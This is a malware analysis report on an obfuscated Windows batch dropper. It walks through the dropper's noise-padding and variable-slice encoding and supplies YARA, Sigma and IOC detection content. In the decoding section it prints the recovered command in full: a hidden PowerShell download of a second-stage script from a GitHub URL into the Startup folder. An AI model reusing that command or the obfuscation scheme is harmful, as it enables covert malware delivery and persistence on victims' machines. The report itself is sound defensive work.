familyunclassified-rouki-obfuscator-batch-dropperconfidencemediumcreated2026-08-12updated2026-08-12scriptdropperobfuscationdefense-evasionexecutionc2persistence
SHA-256: 448682ebd829c6c05dda879d4609106d8c115b80ac1df15e0f4d28dd7176c193

unclassified-rouki-obfuscator-batch-dropper: 448682ebd8 — 5.8 MB kaomoji-and-CJK noise batch dropper with Chinese-variable slice encoding

Executive Summary

A 5.8 MB Windows batch dropper obfuscated by the open-source Rouki-OBFUSCATOR (author EscaLag, GitHub github.com/rouki). The script uses a multi-tier noise injection: kaomoji emoticons, Arabic script fragments, CJK ideographs, and undefined variable blocks pad the visible surface, while the real payload is encoded via %PUBLIC:~n,1%-driven command construction and %chinese_var:~n,1% string-slice substitution. Execution chain: self-write decoded payload to disk → echo a 289 KB base64 blob → start /min powershell.exe to download a GitHub-hosted second-stage .bat and persist it to the user Startup folder. Static-only; CAPE skipped (not a binary). ^[file.txt]

What It Is

Field Value
SHA-256 448682ebd829c6c05dda879d4609106d8c115b80ac1df15e0f4d28dd7176c193
File name Dental records + x-rays.bat ^[metadata.json]
Size 5,776,593 bytes (5.8 MB) ^[metadata.json]
Type Unicode text, UTF-8 text, with very long lines (31823), with CRLF line terminators, with escape sequences ^[file.txt]
YARA None ^[yara.txt]
CAPE Skipped — not a supported binary class ^[dynamic-analysis.md]

Build provenance. The file opens with a batch label :Rouki-OBFUSCATOR and two SET metadata lines naming author EscaLag and GitHub github.com/rouki ^[strings.txt:8-10]. These match the open-source Rouki batch obfuscator, a commodity tool sold/shared on crimeware forums. The binary is a plain-text .bat file with 25 CRLF-delimited logical lines, one of which is a 3.4 M character payload line. ^[strings.txt]

Obfuscation tiers.

  1. Tier 1 — caret escape splitting. Every batch keyword is broken with ^ insertion (ec^%…%ho, cl^%…%s, se^%…%t) so naive regex string matching fails. 175 caret escapes observed. ^[strings.txt:1-20]

  2. Tier 2 — %public:~n,1% command assembly. The literal string set is spelled character-by-character by slicing %PUBLIC% (defaults to C:\Users\Public): s = %public:~0,1%, e = %public:~5,1%, t = %public:~4,1%. Thirteen such slices build the first set command. ^[strings.txt:20-22]

  3. Tier 3 — kaomoji/emoji/CJK/Arabic noise blocks. Undefined %var% expansions containing kaomoji (ヾ(⌐■_■)ノ, ┌(ಠ_ಠ)┘, ◕‿◕, ⊙ω⊙), Arabic script fragments, and CJK ideographs (製秘魔文的訊, 無神法無已) are scattered between tokens. Because these variables are never defined, they expand to empty strings at runtime, serving purely as anti-static padding. 388 kaomoji blocks, 40 Arabic fragments, 290,853 CJK characters. ^[strings.txt:6-13]

  4. Tier 4 — Chinese-character variable names with 65-char substitution alphabets. Five variables are defined with 65-character values: 爱豆尔斯, 耻色耻维, 色斯阿斯, 贝贝维爱, 饿贝豆尔. The payload is then encoded as ~290,000 %varname:~n,1% slice tokens referencing these alphabets. Each variable value is a permutation of printable ASCII mixed with @, =, and space. ^[strings.txt:21-97]

  5. Tier 5 — 289 KB base64 echo + PowerShell download-and-persist tail. After decoding, the script writes a 289,787-character base64 string via @echo, then appends a PowerShell DownloadFile command that fetches https://github.com/urerfie/base/raw/main/zdd.bat and drops it to %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecuryti.bat. ^[decoded_payload_tail]

How It Works

Entry point

Line 0 disables codepage echo and clears the screen via caret-escaped fragments. A for /l %%i in (1,1,1) infinite loop checks whether __author__ or __github__ are defined; if so, it prints Rouki OBFUSCATION and exits — a watermark/tamper gate. ^[strings.txt:1-28]

Variable bootstrap

The first variable (爱豆尔斯) is set literally with a 65-character value: ghHJCnyOqS FaxpDews7BofT9i0NjrLlQzG2@IAKPR3v5tMY=UXVuc864mEbkZ1Wd ^[strings.txt:21]. The remaining four variables (耻色耻维, 色斯阿斯, 贝贝维爱, 饿贝豆尔) are defined via %爱豆尔斯:~n,1% slice tokens, chaining the substitution alphabet forward. ^[strings.txt:28-97]

Payload decode

A single 3.4 M character line (segment 19) contains 290,064 %varname:~n,1% slice tokens. Decoding this line with the five substitution alphabets produces:

  • @echo [289,787 chars base64]
  • echo off
  • start /min powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/urerfie/base/raw/main/zdd.bat', '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecuryti.bat');" ^[decoded_payload]

The 217,340-byte base64 blob decodes to high-entropy data with no recognizable header (no MZ, ELF, PK, PDF, or GZIP magic). It is likely an encrypted inner payload, a decoy, or padding whose real purpose only resolves at second-stage execution. ^[decoded_base64_analysis]

Persistence

The PowerShell command stages the downloaded .bat into the user Startup folder with the masquerade name WindowSecuryti.bat. On next logon, Windows executes it automatically. ^[decoded_payload_tail]

C2 Infrastructure

Indicator Value Type
Second-stage URL https://github.com/urerfie/base/raw/main/zdd.bat Download URL
Persistence path %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecuryti.bat File system
Social-engineering lure Dental records + x-rays.bat Filename

No hardcoded IPs, domains beyond the GitHub raw URL, mutexes, or registry keys observed. The GitHub user urerfie is the only static C2 artifact. ^[decoded_payload_tail]

Interesting Tidbits

  • Open-source tooling as threat artifact. The :Rouki-OBFUSCATOR watermark and author metadata make attribution to the tool trivial for a human analyst, yet the same metadata defeats fully automated triage that stops at file-type classification (Unicode text). ^[strings.txt:8-10]
  • Startup-folder persistence without UAC elevation. The script writes to the user Startup folder (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup), not the system-wide %ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp, meaning it succeeds without admin privileges. ^[decoded_payload_tail]
  • TLS 1.2 pinning. The PowerShell command explicitly forces [Net.SecurityProtocolType]::Tls12, a common pattern in commodity droppers that break on older Windows versions with default SSL3/TLS 1.0. ^[decoded_payload_tail]
  • Masquerade name WindowSecuryti. The typo (Securyti instead of Security) is likely intentional to evade naive string matching for "Windows Security." ^[decoded_payload_tail]
  • No dynamic analysis possible. CAPE skipped because the sample is not a PE. Any behavioral analysis must be performed via manual batch emulation or sandboxing with a Windows guest that handles .bat files natively. ^[dynamic-analysis.md]

Deployable Signatures

YARA

rule rouki_obfuscator_batch_dropper
{
    meta:
        description = "Rouki-OBFUSCATOR batch dropper with kaomoji/CJK noise and Chinese-variable slice encoding"
        author = "PacketPursuit"
        date = "2026-08-12"
        reference = "/intel/analyses/448682ebd829c6c05dda879d4609106d8c115b80ac1df15e0f4d28dd7176c193.html"
    strings:
        $label = ":Rouki-OBFUSCATOR" nocase ascii wide
        $author = "__author__=EscaLag" ascii wide
        $github = "__github__=github.com/rouki" ascii wide
        $kaomoji1 = "ヾ(⌐■_■)ノ" ascii wide
        $kaomoji2 = "┌( ಠ_ಠ)┘" ascii wide
        $kaomoji3 = "◕‿◕" ascii wide
        $public_slice = "%public:~" ascii wide
        $chinese_var1 = "爱豆尔斯" ascii wide
        $chinese_var2 = "耻色耻维" ascii wide
        $chinese_var3 = "色斯阿斯" ascii wide
        $chinese_var4 = "贝贝维爱" ascii wide
        $chinese_var5 = "饿贝豆尔" ascii wide
    condition:
        $label and ($author or $github) and $public_slice and 2 of ($chinese_var*)
}

Behavioral hunt query (Sigma)

title: Rouki Obfuscator Batch Dropper Execution
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\cmd.exe'
        CommandLine|contains:
            - 'WindowSecuryti'
            - 'github.com/urerfie'
            - 'zdd.bat'
        CommandLine|contains|all:
            - 'powershell.exe'
            - 'DownloadFile'
            - 'Tls12'
    condition: selection
falsepositives:
    - Unknown
level: high

IOC list

Indicator Type Context
448682ebd829c6c05dda879d4609106d8c115b80ac1df15e0f4d28dd7176c193 SHA-256 Original dropper
Dental records + x-rays.bat Filename Social-engineering lure
https://github.com/urerfie/base/raw/main/zdd.bat URL Second-stage payload
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecuryti.bat File path Persistence
:Rouki-OBFUSCATOR Batch label Tool watermark
__author__=EscaLag String Tool metadata
github.com/rouki String Tool metadata

Behavioral fingerprint

A .bat file exceeding 5 MB with :Rouki-OBFUSCATOR label, EscaLag author metadata, and thousands of %public:~n,1% slice tokens interleaved with kaomoji/CJK noise blocks. At runtime it decodes a base64 blob and spawns powershell.exe -WindowStyle Hidden with DownloadFile to a GitHub raw URL, staging the result to the user Startup folder.

Detection Signatures (ATT&CK)

Technique ID Evidence
User Execution: Malicious File T1204.002 .bat dropper with social-engineering filename
Command Obfuscation T1027.010 Caret escape, %var:~n,1% slice encoding, kaomoji/CJK noise padding
Ingress Tool Transfer T1105 PowerShell DownloadFile fetches second-stage .bat
Boot or Logon Autostart Execution: Startup Folder T1547.001 Drops to %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecuryti.bat
Application Layer Protocol: Web Protocols T1071.001 HTTPS download via System.Net.WebClient
Data Encoding: Standard Encoding T1132.001 Base64 blob written via @echo

References

Provenance

  • file.txt — file type, size ^[file.txt]
  • metadata.json — artifact metadata ^[metadata.json]
  • triage.json — triage record ^[triage.json]
  • strings.txt — raw strings with line refs ^[strings.txt:1-97]
  • rabin2-info.txt — confirms bits=0, havecode=false (not a binary) ^[rabin2-info.txt]
  • dynamic-analysis.md — CAPE skipped (not supported binary class) ^[dynamic-analysis.md]
  • yara.txt — no YARA matches ^[yara.txt]
  • Decoded payload analysis performed via Python script on <sample 448682ebd829.bin>